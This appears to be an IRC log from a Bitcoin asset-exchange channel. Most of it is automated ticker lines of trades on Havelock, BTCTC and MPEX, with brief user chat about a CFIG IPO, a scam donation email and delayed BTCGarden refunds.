[LABCOIN] 1000 @ 0.001482 = 1.482 BTC [-] Aug 12 19:07:38 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:07:42 [HAVELOCK] [SMG] 85 @ 0.000197 = 0.0167 BTC [-] Aug 12 19:07:49 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 12 19:07:52 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 19:07:55 [HAVELOCK] [SMG] 1100 @ 0.000195 = 0.2145 BTC [-] Aug 12 19:08:06 [HAVELOCK] [CFIG] 66 @ 0.15 = 9.9 BTC Aug 12 19:08:08 did havelock get compromised? Aug 12 19:08:14 Hiro2: ? no? Aug 12 19:08:16 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 19:08:25 [HAVELOCK] [XBOND] 450 @ 0.0010312 = 0.464 BTC [+] Aug 12 19:08:30 [HAVELOCK] [CFIG] 500 @ 0.15 = 75 BTC Aug 12 19:08:45 [HAVELOCK] [SMG] 1010 @ 0.000191 = 0.1929 BTC [-] Aug 12 19:08:48 [HAVELOCK] [CFIG] 34 @ 0.15 = 5.1 BTC Aug 12 19:08:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.04008 = 0.8016 BTC [+] Aug 12 19:08:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.04009 = 2.0045 BTC [+] Aug 12 19:08:58 [BTCTC] [TAT.ASICMINER] 30 @ 0.0401 = 1.203 BTC [+] Aug 12 19:09:00 [HAVELOCK] [SMG] 802 @ 0.0001901 = 0.1525 BTC [-] Aug 12 19:09:00 cfig ipo Aug 12 19:09:02 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 12 19:09:04 that's why Aug 12 19:09:09 [HAVELOCK] [SMG] 1195 @ 0.00019 = 0.2271 BTC [-] Aug 12 19:09:14 [HAVELOCK] [AM100] 1 @ 0.0360001 BTC [-] Aug 12 19:09:17 [BTCTC] [ASICMINER-PT] 1 @ 4.056 BTC [-] Aug 12 19:09:20 [HAVELOCK] [SMG] 1089 @ 0.00019 = 0.2069 BTC [-] Aug 12 19:09:24 [HAVELOCK] [CFIG] 7 @ 0.15 = 1.05 BTC Aug 12 19:09:28 [HAVELOCK] [XBOND] 450 @ 0.0010312 = 0.464 BTC [+] Aug 12 19:09:31 [HAVELOCK] [XBOND] 450 @ 0.0010311 = 0.464 BTC [-] Aug 12 19:09:33 [HAVELOCK] [XBOND] 450 @ 0.0010311 = 0.464 BTC [-] Aug 12 19:09:36 [HAVELOCK] [XBOND] 38 @ 0.0010311 = 0.0392 BTC [-] Aug 12 19:09:38 [HAVELOCK] [SMG] 600 @ 0.0001901 = 0.1141 BTC [+] Aug 12 19:09:40 [HAVELOCK] [AM100] 1 @ 0.0360001 BTC [-] Aug 12 19:09:53 [BTCTC] [RSM] 2 @ 0.01192 = 0.0238 BTC [+] Aug 12 19:10:07 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 12 19:10:11 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:10:49 [HAVELOCK] [XBOND] 200 @ 0.0010468 = 0.2094 BTC [+] Aug 12 19:11:02 [HAVELOCK] [XBOND] 450 @ 0.0010311 = 0.464 BTC [-] Aug 12 19:11:04 [HAVELOCK] [XBOND] 693 @ 0.00103101 = 0.7145 BTC [-] Aug 12 19:11:07 [HAVELOCK] [XBOND] 193 @ 0.00103101 = 0.199 BTC [-] Aug 12 19:11:18 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 12 19:11:48 [HAVELOCK] [AM100] 5 @ 0.0360001 = 0.18 BTC [-] Aug 12 19:11:57 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:12:13 [BTCTC] [BASIC-MINING] 1 @ 0.293 BTC [-] Aug 12 19:12:16 [BTCTC] [BASIC-MINING] 1 @ 0.292 BTC [-] Aug 12 19:12:18 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 19:12:20 [BTCTC] [BASIC-MINING] 2 @ 0.2919 = 0.5838 BTC [-] Aug 12 19:12:22 [BTCTC] [BASIC-MINING] 1 @ 0.29 BTC [-] Aug 12 19:12:23 [HAVELOCK] [SMG] 403 @ 0.0001901 = 0.0766 BTC [+] Aug 12 19:12:26 [BTCTC] [BASIC-MINING] 2 @ 0.2868 = 0.5736 BTC [-] Aug 12 19:12:28 [BTCTC] [BASIC-MINING] 3 @ 0.2867 = 0.8601 BTC [-] Aug 12 19:12:30 [HAVELOCK] [SMG] 3911 @ 0.00019 = 0.7431 BTC [-] Aug 12 19:12:38 [HAVELOCK] [AM100] 1 @ 0.0362 BTC [+] Aug 12 19:12:53 [HAVELOCK] [SDSTM] 16 @ 0.0062774 = 0.1004 BTC [+] Aug 12 19:13:19 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 12 19:13:22 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 12 19:13:25 [BTCTC] [TAT.ASICMINER] 6 @ 0.03911 = 0.2347 BTC [-] Aug 12 19:13:27 [BTCTC] [TAT.ASICMINER] 31 @ 0.0391 = 1.2121 BTC [-] Aug 12 19:13:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.03901 = 0.3901 BTC [-] Aug 12 19:13:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.039 = 1.95 BTC [-] Aug 12 19:13:42 [HAVELOCK] [SDSTM] 2 @ 0.0062775 = 0.0126 BTC [+] Aug 12 19:13:57 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 19:14:03 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:14:09 [HAVELOCK] [SDSTM] 2 @ 0.0062775 = 0.0126 BTC [+] Aug 12 19:14:21 [HAVELOCK] [XBOND] 472 @ 0.0010311 = 0.4867 BTC [+] Aug 12 19:14:35 [HAVELOCK] [XBOND] 1854 @ 0.00103101 = 1.9115 BTC [-] Aug 12 19:14:49 [BTCTC] [LABCOIN] 30 @ 0.001484 = 0.0445 BTC [+] Aug 12 19:14:50 [BTCTC] [LABCOIN] 100 @ 0.001483 = 0.1483 BTC [-] Aug 12 19:14:52 [BTCTC] [LABCOIN] 70 @ 0.001476 = 0.1033 BTC [-] Aug 12 19:14:53 [HAVELOCK] [CFIG] 6 @ 0.15 = 0.9 BTC Aug 12 19:14:55 [BTCTC] [LABCOIN] 9 @ 0.00147 = 0.0132 BTC [-] Aug 12 19:14:56 [BTCTC] [LABCOIN] 100 @ 0.00147 = 0.147 BTC [-] Aug 12 19:14:57 [HAVELOCK] [XBOND] 1 @ 0.0010463 BTC [+] Aug 12 19:14:59 [BTCTC] [LABCOIN] 90 @ 0.001466 = 0.1319 BTC [-] Aug 12 19:14:59 [BTCTC] [LABCOIN] 100 @ 0.001462 = 0.1462 BTC [-] Aug 12 19:15:01 [BTCTC] [LABCOIN] 250 @ 0.001461 = 0.3653 BTC [-] Aug 12 19:15:02 [BTCTC] [LABCOIN] 920 @ 0.001459 = 1.3423 BTC [-] Aug 12 19:15:03 [BTCTC] [LABCOIN] 849 @ 0.001459 = 1.2387 BTC [-] Aug 12 19:15:04 [BTCTC] [LABCOIN] 6500 @ 0.001458 = 9.477 BTC [-] Aug 12 19:15:05 [BTCTC] [LABCOIN] 295 @ 0.001457 = 0.4298 BTC [-] Aug 12 19:15:06 [BTCTC] [LABCOIN] 380 @ 0.001457 = 0.5537 BTC [-] Aug 12 19:15:07 [BTCTC] [LABCOIN] 60 @ 0.001456 = 0.0874 BTC [-] Aug 12 19:15:08 [BTCTC] [LABCOIN] 5000 @ 0.001456 = 7.28 BTC [-] Aug 12 19:15:09 [BTCTC] [LABCOIN] 7000 @ 0.001456 = 10.192 BTC [-] Aug 12 19:15:09 [BTCTC] [LABCOIN] 5000 @ 0.001455 = 7.275 BTC [-] Aug 12 19:15:10 [BTCTC] [LABCOIN] 12752 @ 0.001455 = 18.5542 BTC [-] Aug 12 19:15:11 [HAVELOCK] [CFIG] 15 @ 0.15 = 2.25 BTC Aug 12 19:15:14 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC Aug 12 19:15:46 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:15:52 [BTCTC] [LABCOIN] 30 @ 0.001456 = 0.0437 BTC [+] Aug 12 19:15:56 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:16:03 [BTCTC] [DMS.PURCHASE] 1 @ 0.02801 BTC [-] Aug 12 19:16:11 [HAVELOCK] [SMG] 686 @ 0.000181 = 0.1242 BTC [-] Aug 12 19:16:16 [BTCTC] [ASICMINER-PT] 1 @ 4.149 BTC [+] Aug 12 19:16:16 [BTCTC] [LABCOIN] 246 @ 0.001455 = 0.3579 BTC [-] Aug 12 19:16:26 [BTCTC] [LABCOIN] 30 @ 0.001456 = 0.0437 BTC [+] Aug 12 19:16:27 [BTCTC] [LABCOIN] 2270 @ 0.001455 = 3.3029 BTC [-] Aug 12 19:16:32 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 12 19:16:34 [HAVELOCK] [AM1] 1 @ 3.75 BTC [-] Aug 12 19:16:37 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 12 19:16:40 [BTCTC] [LABCOIN] 30 @ 0.001457 = 0.0437 BTC [+] Aug 12 19:16:41 [BTCTC] [LABCOIN] 1170 @ 0.001455 = 1.7024 BTC [-] Aug 12 19:17:33 [BTCTC] [B.YABMC] 5 @ 0.00288 = 0.0144 BTC [-] Aug 12 19:17:43 [HAVELOCK] [CFIG] 25 @ 0.15 = 3.75 BTC Aug 12 19:17:47 [BTCTC] [LABCOIN] 30 @ 0.001456 = 0.0437 BTC [+] Aug 12 19:17:48 [BTCTC] [LABCOIN] 470 @ 0.001455 = 0.6839 BTC [-] Aug 12 19:18:30 [BTCTC] [LABCOIN] 30 @ 0.001502 = 0.0451 BTC [+] Aug 12 19:18:31 [BTCTC] [LABCOIN] 25 @ 0.001502 = 0.0376 BTC [+] Aug 12 19:19:21 [BTCTC] [ASICMINER-PT] 2 @ 4.057 = 8.114 BTC [-] Aug 12 19:20:15 [BTCTC] [LABCOIN] 220 @ 0.001502 = 0.3304 BTC [+] Aug 12 19:20:25 [BTCTC] [LABCOIN] 659 @ 0.001502 = 0.9898 BTC [+] Aug 12 19:21:08 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 12 19:21:20 [HAVELOCK] [CFIG] 22 @ 0.15 = 3.3 BTC Aug 12 19:21:21 .d Aug 12 19:21:29 well fuck you ozbot Aug 12 19:21:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005665 = 0.17 BTC [-] Aug 12 19:21:40 [BTCTC] [ACTIVEMINING] 50 @ 0.005664 = 0.2832 BTC [-] Aug 12 19:21:41 [BTCTC] [ACTIVEMINING] 2 @ 0.005616 = 0.0112 BTC [-] Aug 12 19:21:42 [BTCTC] [ACTIVEMINING] 14 @ 0.005615 = 0.0786 BTC [-] Aug 12 19:21:43 ;;echo .d Aug 12 19:21:43 .d Aug 12 19:21:43 [BTCTC] [ACTIVEMINING] 20 @ 0.005577 = 0.1115 BTC [-] Aug 12 19:21:44 37392766.13647 | Next Diff in 204 blocks | Estimated Change: 36.5450% in 0d 21h 12m 49s Aug 12 19:21:44 [BTCTC] [ACTIVEMINING] 23 @ 0.005576 = 0.1282 BTC [-] Aug 12 19:22:07 [BTCTC] [DMS.MINING] 3 @ 0.003649 = 0.0109 BTC [+] Aug 12 19:22:26 [BTCTC] [LABCOIN] 566 @ 0.001502 = 0.8501 BTC [+] Aug 12 19:24:14 [BTCTC] [DMS.MINING] 2 @ 0.003649 = 0.0073 BTC [+] Aug 12 19:24:45 [HAVELOCK] [XBOND] 1 @ 0.0010463 BTC [+] Aug 12 19:25:04 so is icedrill the new buzzword Aug 12 19:25:16 [BTCTC] [LABCOIN] 50 @ 0.001492 = 0.0746 BTC [-] Aug 12 19:25:17 [BTCTC] [LABCOIN] 100 @ 0.001482 = 0.1482 BTC [-] Aug 12 19:25:19 [BTCTC] [LABCOIN] 200 @ 0.001461 = 0.2922 BTC [-] Aug 12 19:25:20 [BTCTC] [LABCOIN] 413 @ 0.001456 = 0.6013 BTC [-] Aug 12 19:25:21 [BTCTC] [LABCOIN] 2237 @ 0.001455 = 3.2548 BTC [-] Aug 12 19:25:57 [HAVELOCK] [CFIG] 133 @ 0.15 = 19.95 BTC Aug 12 19:26:00 [HAVELOCK] [XBOND] 491 @ 0.0010313 = 0.5064 BTC [-] Aug 12 19:26:09 [HAVELOCK] [XBOND] 10 @ 0.00103111 = 0.0103 BTC [-] Aug 12 19:26:19 [HAVELOCK] [XBOND] 486 @ 0.0010311 = 0.5011 BTC [-] Aug 12 19:26:21 [HAVELOCK] [XBOND] 1013 @ 0.00103101 = 1.0444 BTC [-] Aug 12 19:26:44 [HAVELOCK] [CFIG] 13 @ 0.15 = 1.95 BTC Aug 12 19:26:47 [BTCTC] [LABCOIN] 30 @ 0.001498 = 0.0449 BTC [+] Aug 12 19:26:51 [HAVELOCK] [AM100] 1 @ 0.03867 BTC [+] Aug 12 19:27:28 [HAVELOCK] [LABCO] 20 @ 0.001559 = 0.0312 BTC [+] Aug 12 19:27:37 [BTCTC] [LABCOIN] 30 @ 0.001498 = 0.0449 BTC [+] Aug 12 19:27:37 [HAVELOCK] [LABCO] 10 @ 0.00156 = 0.0156 BTC [+] Aug 12 19:27:43 [HAVELOCK] [LABCO] 25 @ 0.0015659 = 0.0391 BTC [+] Aug 12 19:27:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.04007 BTC [+] Aug 12 19:27:51 [HAVELOCK] [LABCO] 3 @ 0.001568 = 0.0047 BTC [+] Aug 12 19:28:02 [HAVELOCK] [LABCO] 25 @ 0.001569 = 0.0392 BTC [+] Aug 12 19:28:16 [BTCTC] [LABCOIN] 3 @ 0.001497 = 0.0045 BTC [-] Aug 12 19:28:17 [BTCTC] [LABCOIN] 27 @ 0.001498 = 0.0404 BTC [+] Aug 12 19:28:31 [BTCTC] [LABCOIN] 1 @ 0.001497 BTC [-] Aug 12 19:29:06 [BTCTC] [LABCOIN] 30 @ 0.001497 = 0.0449 BTC [-] Aug 12 19:29:19 [BTCTC] [LABCOIN] 1 @ 0.001498 BTC [+] Aug 12 19:29:21 [BTCTC] [LABCOIN] 29 @ 0.001498 = 0.0434 BTC [+] Aug 12 19:29:22 [BTCTC] [LABCOIN] 21 @ 0.001499 = 0.0315 BTC [+] Aug 12 19:30:49 [HAVELOCK] [LABCO] 10 @ 0.00131 = 0.0131 BTC [-] Aug 12 19:30:58 [HAVELOCK] [LABCO] 10 @ 0.00131 = 0.0131 BTC [-] Aug 12 19:31:06 [HAVELOCK] [LABCO] 910 @ 0.0013 = 1.183 BTC [-] Aug 12 19:31:11 [BTCTC] [LABCOIN] 120 @ 0.001498 = 0.1798 BTC [-] Aug 12 19:31:12 [BTCTC] [LABCOIN] 945 @ 0.001499 = 1.4166 BTC [+] Aug 12 19:31:13 [BTCTC] [LABCOIN] 20 @ 0.0015 = 0.03 BTC [+] Aug 12 19:31:14 [BTCTC] [LABCOIN] 55 @ 0.001501 = 0.0826 BTC [+] Aug 12 19:31:16 [BTCTC] [LABCOIN] 242 @ 0.001502 = 0.3635 BTC [+] Aug 12 19:31:17 [BTCTC] [LABCOIN] 200 @ 0.001503 = 0.3006 BTC [+] Aug 12 19:31:50 [HAVELOCK] [CFIG] 8 @ 0.15 = 1.2 BTC Aug 12 19:31:53 [BTCTC] [ASICMINER-PT] 1 @ 4.16 BTC [+] Aug 12 19:31:54 [BTCTC] [ASICMINER-PT] 1 @ 4.165 BTC [+] Aug 12 19:33:11 [HAVELOCK] [XBOND] 19 @ 0.00104 = 0.0198 BTC [+] Aug 12 19:33:25 [HAVELOCK] [XBOND] 534 @ 0.0010315 = 0.5508 BTC [-] Aug 12 19:33:33 [HAVELOCK] [XBOND] 10 @ 0.0010315 = 0.0103 BTC [-] Aug 12 19:33:43 [HAVELOCK] [XBOND] 534 @ 0.0010314 = 0.5508 BTC [-] Aug 12 19:33:52 [HAVELOCK] [XBOND] 903 @ 0.00103001 = 0.9301 BTC [-] Aug 12 19:34:02 [HAVELOCK] [XBOND] 442 @ 0.00103001 = 0.4553 BTC [-] Aug 12 19:34:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001536 BTC [-] Aug 12 19:34:25 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 12 19:34:28 [HAVELOCK] [CFIG] 13 @ 0.15 = 1.95 BTC Aug 12 19:34:40 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:35:50 [HAVELOCK] [XBOND] 6 @ 0.0010463 = 0.0063 BTC [+] Aug 12 19:36:47 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 19:37:00 [HAVELOCK] [LABCO] 2 @ 0.0013 = 0.0026 BTC [-] Aug 12 19:37:03 [HAVELOCK] [LABCO] 2 @ 0.00125 = 0.0025 BTC [-] Aug 12 19:37:05 [HAVELOCK] [LABCO] 8 @ 0.0011865 = 0.0095 BTC [-] Aug 12 19:37:07 [HAVELOCK] [LABCO] 8 @ 0.00118001 = 0.0094 BTC [-] Aug 12 19:37:09 [HAVELOCK] [LABCO] 50 @ 0.001171 = 0.0586 BTC [-] Aug 12 19:37:11 [HAVELOCK] [LABCO] 8 @ 0.001162 = 0.0093 BTC [-] Aug 12 19:37:14 [HAVELOCK] [LABCO] 52 @ 0.001161 = 0.0604 BTC [-] Aug 12 19:37:26 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:37:27 theymos soliciting for forum donations? or is that a scam email? Aug 12 19:38:11 scam Aug 12 19:38:16 its scam either way Aug 12 19:38:19 heh Aug 12 19:39:11 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Aug 12 19:39:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.04005 BTC [-] Aug 12 19:39:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.04006 = 0.4006 BTC [+] Aug 12 19:39:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.04009 = 0.3207 BTC [+] Aug 12 19:39:36 [BTCTC] [TAT.ASICMINER] 41 @ 0.0401 = 1.6441 BTC [+] Aug 12 19:39:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.04034 = 0.242 BTC [+] Aug 12 19:39:38 [BTCTC] [TAT.ASICMINER] 31 @ 0.04035 = 1.2509 BTC [+] Aug 12 19:39:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.0404 = 0.1212 BTC [+] Aug 12 19:40:36 [BTCTC] [LABCOIN] 25 @ 0.001519 = 0.038 BTC [+] Aug 12 19:40:41 topace scam email Aug 12 19:40:44 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 12 19:41:10 [HAVELOCK] [XBOND] 5 @ 0.0010463 = 0.0052 BTC [+] Aug 12 19:43:24 [HAVELOCK] [CFIG] 74 @ 0.15 = 11.1 BTC Aug 12 19:43:39 [BTCTC] [ACTIVEMINING] 442 @ 0.005675 = 2.5084 BTC [+] Aug 12 19:43:40 [BTCTC] [ACTIVEMINING] 30 @ 0.005676 = 0.1703 BTC [+] Aug 12 19:43:41 [BTCTC] [ACTIVEMINING] 94 @ 0.005677 = 0.5336 BTC [+] Aug 12 19:43:43 [BTCTC] [ACTIVEMINING] 31 @ 0.005699 = 0.1767 BTC [+] Aug 12 19:43:44 [BTCTC] [ACTIVEMINING] 155 @ 0.0057 = 0.8835 BTC [+] Aug 12 19:43:45 [BTCTC] [ACTIVEMINING] 103 @ 0.005824 = 0.5999 BTC [+] Aug 12 19:45:08 [BTCTC] [LABCOIN] 6 @ 0.001519 = 0.0091 BTC [+] Aug 12 19:45:19 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:46:17 [BTCTC] [LABCOIN] 124 @ 0.001519 = 0.1884 BTC [+] Aug 12 19:46:25 [HAVELOCK] [XBOND] 558 @ 0.0010313 = 0.5755 BTC [-] Aug 12 19:46:27 [HAVELOCK] [XBOND] 342 @ 0.0010312 = 0.3527 BTC [-] Aug 12 19:46:30 [BTCTC] [ASICMINER-PT] 6 @ 4.1 = 24.6 BTC [-] Aug 12 19:47:37 [HAVELOCK] [CFIG] 6 @ 0.15 = 0.9 BTC Aug 12 19:47:45 [BTCTC] [LABCOIN] 132 @ 0.00152 = 0.2006 BTC [+] Aug 12 19:48:17 [BTCTC] [LABCOIN] 108 @ 0.001519 = 0.1641 BTC [-] Aug 12 19:48:37 [BTCTC] [LABCOIN] 18 @ 0.001519 = 0.0273 BTC [-] Aug 12 19:48:46 [BTCTC] [TAT.ASICMINER] 15 @ 0.0404 = 0.606 BTC [+] Aug 12 19:48:48 [BTCTC] [TAT.ASICMINER] 44 @ 0.0406 = 1.7864 BTC [+] Aug 12 19:49:28 [HAVELOCK] [CFIG] 32 @ 0.15 = 4.8 BTC Aug 12 19:57:53 [BTCTC] [TAT.ASICMINER] 22 @ 0.0407 = 0.8954 BTC [+] Aug 12 20:01:16 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 12 20:03:21 [BTCTC] [TAT.ASICMINER] 11 @ 0.0407 = 0.4477 BTC [+] Aug 12 20:03:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.0408 = 0.0816 BTC [+] Aug 12 20:03:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.0408 = 1.02 BTC [+] Aug 12 20:04:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.0409 = 0.1636 BTC [+] Aug 12 20:04:29 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 12 20:06:50 [BTCTC] [COGNITIVE] 10 @ 0.36 = 3.6 BTC [-] Aug 12 20:06:51 [BTCTC] [COGNITIVE] 1 @ 0.36 BTC [-] Aug 12 20:09:16 [BTCTC] [LABCOIN] 30 @ 0.001554 = 0.0466 BTC [+] Aug 12 20:09:18 [BTCTC] [LABCOIN] 23 @ 0.001555 = 0.0358 BTC [+] Aug 12 20:10:20 [BTCTC] [DMS.SELLING] 151 @ 0.0259 = 3.9109 BTC [-] Aug 12 20:10:56 [HAVELOCK] [AM100] 1 @ 0.0381 BTC [-] Aug 12 20:11:22 [BTCTC] [ACTIVEMINING] 10 @ 0.005795 = 0.058 BTC [-] Aug 12 20:11:23 [BTCTC] [ACTIVEMINING] 50 @ 0.005796 = 0.2898 BTC [+] Aug 12 20:12:34 has anyone had their BTCGarden funds returned yet ? Aug 12 20:12:36 [BTCTC] [DMS.MINING] 1 @ 0.003649 BTC [+] Aug 12 20:14:58 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 20:15:10 not so far. Aug 12 20:16:43 mircea_popescu: Nor I. Sucks. Aug 12 20:17:29 well the term was a day or two. Aug 12 20:17:33 it's been a little over half a day Aug 12 20:18:20 anyway, if uyou Aug 12 20:18:29 you're worried there's always http://bitbet.us/bet/511/btcgarden-will-complete-its-buyback/ Aug 12 20:18:42 [BTCTC] [LABCOIN] 30 @ 0.001543 = 0.0463 BTC [-] Aug 12 20:18:43 [BTCTC] [LABCOIN] 3 @ 0.001544 = 0.0046 BTC [+] Aug 12 20:18:44 [BTCTC] [LABCOIN] 2 @ 0.001549 = 0.0031 BTC [+] Aug 12 20:18:45 [BTCTC] [LABCOIN] 20 @ 0.00155 = 0.031 BTC [+] Aug 12 20:18:47 [BTCTC] [LABCOIN] 23 @ 0.001555 = 0.0358 BTC [+] Aug 12 20:18:48 [BTCTC] [LABCOIN] 102 @ 0.001556 = 0.1587 BTC [+] Aug 12 20:19:33 [BTCTC] [ASICMINER-PT] 2 @ 4.165 = 8.33 BTC [+] Aug 12 20:19:34 hehe mircea_popescu. Aug 12 20:19:35 [BTCTC] [ASICMINER-PT] 1 @ 4.166 BTC [+] Aug 12 20:19:36 [BTCTC] [ASICMINER-PT] 2 @ 4.168 = 8.336 BTC [+] Aug 12 20:19:36 [BTCTC] [ASICMINER-PT] 1 @ 4.169 BTC [+] Aug 12 20:19:37 [BTCTC] [ASICMINER-PT] 3 @ 4.169 = 12.507 BTC [+] Aug 12 20:19:38 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [+] Aug 12 20:19:39 [BTCTC] [ASICMINER-PT] 2 @ 4.17 = 8.34 BTC [+] Aug 12 20:19:40 [BTCTC] [ASICMINER-PT] 2 @ 4.171 = 8.342 BTC [+] Aug 12 20:19:41 [BTCTC] [ASICMINER-PT] 2 @ 4.172 = 8.344 BTC [+] Aug 12 20:20:13 [BTCTC] [ASICMINER-PT] 2 @ 4.173 = 8.346 BTC [+] Aug 12 20:20:52 [BTCTC] [ASICMINER-PT] 1 @ 4.09 BTC [-] Aug 12 20:21:08 [BTCTC] [TAT.ASICMINER] 33 @ 0.0406 = 1.3398 BTC [-] Aug 12 20:21:09 [BTCTC] [TAT.ASICMINER] 36 @ 0.0409 = 1.4724 BTC [+] Aug 12 20:21:11 [BTCTC] [TAT.ASICMINER] 31 @ 0.0409 = 1.2679 BTC [+] Aug 12 20:22:13 [BTCTC] [BITVPS] 1 @ 0.001992 BTC [-] Aug 12 20:24:04 [BTCTC] [DMS.MINING] 1 @ 0.003649 BTC [+] Aug 12 20:24:06 [BTCTC] [DMS.MINING] 30 @ 0.00345 = 0.1035 BTC [-] Aug 12 20:24:07 [BTCTC] [DMS.MINING] 8 @ 0.003432 = 0.0275 BTC [-] Aug 12 20:24:08 [BTCTC] [DMS.MINING] 3 @ 0.003431 = 0.0103 BTC [-] Aug 12 20:24:10 [BTCTC] [DMS.MINING] 39 @ 0.00343 = 0.1338 BTC [-] Aug 12 20:24:11 [BTCTC] [DMS.MINING] 200 @ 0.003425 = 0.685 BTC [-] Aug 12 20:24:12 [BTCTC] [DMS.MINING] 125 @ 0.003423 = 0.4279 BTC [-] Aug 12 20:24:13 [BTCTC] [DMS.MINING] 63 @ 0.003421 = 0.2155 BTC [-] Aug 12 20:24:15 [BTCTC] [TAT.ASICMINER] 14 @ 0.0409 = 0.5726 BTC [+] Aug 12 20:24:23 [BTCTC] [ACTIVEMINING] 15 @ 0.005815 = 0.0872 BTC [+] Aug 12 20:26:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0409 BTC [+] Aug 12 20:26:58 [BTCTC] [DMS.PURCHASE] 151 @ 0.02801 = 4.2295 BTC [-] Aug 12 20:28:06 [BTCTC] [DMS.MINING] 1 @ 0.003649 BTC [+] Aug 12 20:29:58 [MPEX] [S.MPOE] 6031 @ 0.00084745 = 5.111 BTC [-] Aug 12 20:30:00 [MPEX] [S.MPOE] 10969 @ 0.00084725 = 9.2935 BTC [-] Aug 12 20:31:26 [BTCTC] [LABCOIN] 20 @ 0.001524 = 0.0305 BTC [-] Aug 12 20:31:28 [BTCTC] [LABCOIN] 60 @ 0.001521 = 0.0913 BTC [-] Aug 12 20:31:29 [BTCTC] [LABCOIN] 250 @ 0.001512 = 0.378 BTC [-] Aug 12 20:31:31 [BTCTC] [LABCOIN] 30 @ 0.001512 = 0.0454 BTC [-] Aug 12 20:32:21 [HAVELOCK] [XBOND] 12 @ 0.0010458 = 0.0125 BTC [+] Aug 12 20:32:24 [BTCTC] [LABCOIN] 30 @ 0.001506 = 0.0452 BTC [-] Aug 12 20:32:24 [BTCTC] [LABCOIN] 70 @ 0.001505 = 0.1054 BTC [-] Aug 12 20:32:27 [HAVELOCK] [CFIG] 6 @ 0.15 = 0.9 BTC Aug 12 20:33:48 [BTCTC] [DMS.MINING] 15 @ 0.003422 = 0.0513 BTC [-] Aug 12 20:33:49 [BTCTC] [DMS.MINING] 136 @ 0.003421 = 0.4653 BTC [-] Aug 12 20:35:41 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC Aug 12 20:37:21 [BTCTC] [LABCOIN] 30 @ 0.001534 = 0.046 BTC [+] Aug 12 20:37:31 [BTCTC] [LABCOIN] 30 @ 0.001534 = 0.046 BTC [+] Aug 12 20:37:42 [BTCTC] [BASIC-MINING] 3 @ 0.3073 = 0.9219 BTC [+] Aug 12 20:39:15 [HAVELOCK] [AM100] 6 @ 0.0379 = 0.2274 BTC [-] Aug 12 20:39:20 [HAVELOCK] [AM100] 6 @ 0.038 = 0.228 BTC [+] Aug 12 20:39:26 [HAVELOCK] [AM100] 26 @ 0.038 = 0.988 BTC [+] Aug 12 20:39:29 [HAVELOCK] [AM100] 3 @ 0.03867 = 0.116 BTC [+] Aug 12 20:39:34 [HAVELOCK] [AM100] 10 @ 0.0388 = 0.388 BTC [+] Aug 12 20:39:37 [HAVELOCK] [XBOND] 19 @ 0.0010454 = 0.0199 BTC [-] Aug 12 20:39:40 [HAVELOCK] [AM100] 30 @ 0.0388 = 1.164 BTC [+] Aug 12 20:39:56 [BTCTC] [ACTIVEMINING] 14 @ 0.005809 = 0.0813 BTC [-] Aug 12 20:39:57 [BTCTC] [ACTIVEMINING] 186 @ 0.005809 = 1.0805 BTC [-] Aug 12 20:39:59 [HAVELOCK] [AM100] 28 @ 0.0388999 = 1.0892 BTC [+] Aug 12 20:40:19 [HAVELOCK] [XBOND] 15 @ 0.0010454 = 0.0157 BTC [-] Aug 12 20:40:24 [HAVELOCK] [XBOND] 1 @ 0.0010454 BTC [-] Aug 12 20:40:33 [HAVELOCK] [HIM] 4 @ 0.14475 = 0.579 BTC [+] Aug 12 20:41:40 [BTCTC] [LABCOIN] 30 @ 0.001535 = 0.0461 BTC [+] Aug 12 20:41:40 [BTCTC] [LABCOIN] 57 @ 0.001534 = 0.0874 